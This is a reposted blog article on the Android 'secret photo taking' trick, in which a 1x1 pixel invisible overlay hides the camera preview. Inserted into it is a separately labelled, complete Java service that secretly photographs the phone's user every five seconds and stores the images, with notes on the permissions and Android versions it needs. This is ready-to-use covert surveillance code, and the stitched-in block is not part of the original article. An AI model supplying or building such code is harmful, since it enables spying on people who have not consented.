Exploit the Android Secret Photo Taking Vulnerability

Source: Internet   Tag: MCU micro printer   Editor: 程序博客网   Time: 2024/05/22 00:53


1. Introduction

    Nowadays almost every smartphone integrates a camera, and the number of apps that use the camera is growing sharply. At the same time, more and more apps declare the camera permission in order to do something they should not.

    Around May 2014 Szymon Sidor published the secret photo taking vulnerability. With this flaw an app can take a photo without anyone noticing. The idea is simple and effective: make the preview so small that it can hardly be seen. The following sections show how to craft a secret photo taking demo and run it on a real device.

 

2. Pre-study

    According to safe.baidu.com, an Android app that wants to take a photo with the camera must first call the method startPreview(). Once this method is called, a preview is shown to the user. If that preview is removed from the screen or made invisible, photos can be taken secretly without anyone noticing.

Figure1: Preview


Figure2: Exploit Code Snippet

 

    As figure 2 shows, the snippet sets the width and height of the LayoutParams to 1 and adds flags such as FLAG_NOT_FOCUSABLE and FLAG_NOT_TOUCHABLE. With these LayoutParams, mPreview is passed to WindowManager.addView, so the surface view is placed on screen but occupies only a single pixel. That is practically "invisible".

    The snippet is short, but it leaves out the context of the whole exploit. In the next section I fill in the missing pieces and build a usable exploit.

 

3. Exploit Crafting

    Let's begin with the procedure for taking a picture. As figure 3 shows, hiding the preview means hiding the surface view. The most direct attempt is:

    wm.addView(surfaceView, layoutParams);

    This passes the surface view directly to the WindowManager's addView method with the crafted layout parameters. At runtime, however, it does not work. A likely reason is that a SurfaceView added directly as a window cannot be sized to 1x1 pixels.

    To get around this restriction, create a ViewGroup (for example a layout), add the surface view to it, and pass the ViewGroup to WindowManager.addView instead. That works.

    The exploit consists of an activity and a service (see figure 4); the main functionality is implemented in the service. Because the window is added from a service rather than an activity, it has to be an overlay window type, so the manifest must declare SYSTEM_ALERT_WINDOW in addition to CAMERA. Once the app is running, it takes a photo every few seconds, all day long, until the process is killed.
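The following Java service is an added example that puts the whole procedure described above into one runnable unit (1x1 LayoutParams with the not-focusable/not-touchable flags, the ViewGroup wrapper around the SurfaceView, and a service that fires the shutter every few seconds). It is not code from this page or from the PhotoCapturer repository. It uses the legacy android.hardware.Camera API that the startPreview()/takePicture() sequence in the write-up refers to. The package name, class name, TYPE_SYSTEM_OVERLAY window type, 5-second interval and output location are assumptions. The manifest must declare CAMERA and SYSTEM_ALERT_WINDOW; on Android 6.0 and later the overlay permission additionally needs the user's consent (Settings.canDrawOverlays), apps targeting Android 8.0 and later must use TYPE_APPLICATION_OVERLAY instead, and from Android 9 an app in the background is denied camera access altogether, so the demo behaves as described only on the Android versions of the 2014 write-up.

```java
// Added example, not the page's or PhotoCapturer's own code.
// Assumes the legacy android.hardware.Camera API and a manifest that declares
// CAMERA and SYSTEM_ALERT_WINDOW. Package/class names and constants are assumptions.
package com.example.covertcam;

import android.app.Service;
import android.content.Intent;
import android.graphics.PixelFormat;
import android.hardware.Camera;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.view.Gravity;
import android.view.SurfaceHolder;
import android.view.SurfaceView;
import android.view.WindowManager;
import android.widget.FrameLayout;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

public class CovertCaptureService extends Service implements SurfaceHolder.Callback {
    private static final long INTERVAL_MS = 5000;   // assumed capture period

    private WindowManager wm;
    private FrameLayout container;                  // the ViewGroup wrapper the article needs
    private Camera camera;
    private final Handler handler = new Handler(Looper.getMainLooper());

    private final Camera.PictureCallback jpegCallback = new Camera.PictureCallback() {
        @Override public void onPictureTaken(byte[] data, Camera cam) {
            File out = new File(getFilesDir(), "p" + System.currentTimeMillis() + ".jpg");
            try (FileOutputStream fos = new FileOutputStream(out)) {
                fos.write(data);                    // store the JPEG in app-private storage
            } catch (IOException ignored) {
            }
            cam.startPreview();                     // takePicture() stops the preview; restart it
            handler.postDelayed(shutter, INTERVAL_MS);
        }
    };

    private final Runnable shutter = new Runnable() {
        @Override public void run() {
            if (camera != null) camera.takePicture(null, null, jpegCallback);
        }
    };

    @Override public void onCreate() {
        super.onCreate();
        wm = (WindowManager) getSystemService(WINDOW_SERVICE);

        // 1x1 overlay window, non-focusable and non-touchable: on screen, but as good as invisible.
        WindowManager.LayoutParams lp = new WindowManager.LayoutParams(
                1, 1,
                WindowManager.LayoutParams.TYPE_SYSTEM_OVERLAY,        // assumed window type
                WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE
                        | WindowManager.LayoutParams.FLAG_NOT_TOUCHABLE
                        | WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL,
                PixelFormat.TRANSLUCENT);
        lp.gravity = Gravity.TOP | Gravity.START;

        SurfaceView preview = new SurfaceView(this);
        preview.getHolder().addCallback(this);
        // Adding the SurfaceView directly fails at runtime; wrap it in a ViewGroup instead.
        container = new FrameLayout(this);
        container.addView(preview, new FrameLayout.LayoutParams(1, 1));
        wm.addView(container, lp);
    }

    @Override public void surfaceCreated(SurfaceHolder holder) {
        try {
            camera = Camera.open();                 // back camera; Camera.open(id) selects another
            camera.setPreviewDisplay(holder);       // preview goes to the 1x1 surface
            camera.startPreview();                  // mandatory before takePicture()
            handler.postDelayed(shutter, INTERVAL_MS);
        } catch (IOException | RuntimeException e) {
            stopSelf();
        }
    }

    @Override public void surfaceChanged(SurfaceHolder holder, int format, int w, int h) { }

    @Override public void surfaceDestroyed(SurfaceHolder holder) { releaseCamera(); }

    @Override public void onDestroy() {
        handler.removeCallbacks(shutter);
        releaseCamera();
        if (container != null) wm.removeView(container);
        super.onDestroy();
    }

    private void releaseCamera() {
        if (camera != null) {
            camera.stopPreview();
            camera.release();                       // free the camera for other apps
            camera = null;
        }
    }

    @Override public IBinder onBind(Intent intent) { return null; }
}
```

The activity from figure 4 only needs to call startService(new Intent(this, CovertCaptureService.class)); the service keeps running, and taking pictures, until it is stopped or the process is killed. Restarting the preview inside the JPEG callback matters: the legacy Camera API stops the preview after each takePicture(), and a second call without startPreview() fails.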

Figure 3: Procedure of taking pictures


 

Figure 4: A brief figure about the exploit

 

4. Summary

    In my opinion, secret photo taking is more of a trick than a vulnerability. Anyway, as long as we can do something interesting with it!

 

5. References

    http://safe.baidu.com/2014-05/android-camera-exploit.html

    http://snacksforyourmind.blogspot.com/2014/05/exploring-limits-of-covert-data.html

    https://github.com/zeqiii/PhotoCapturer
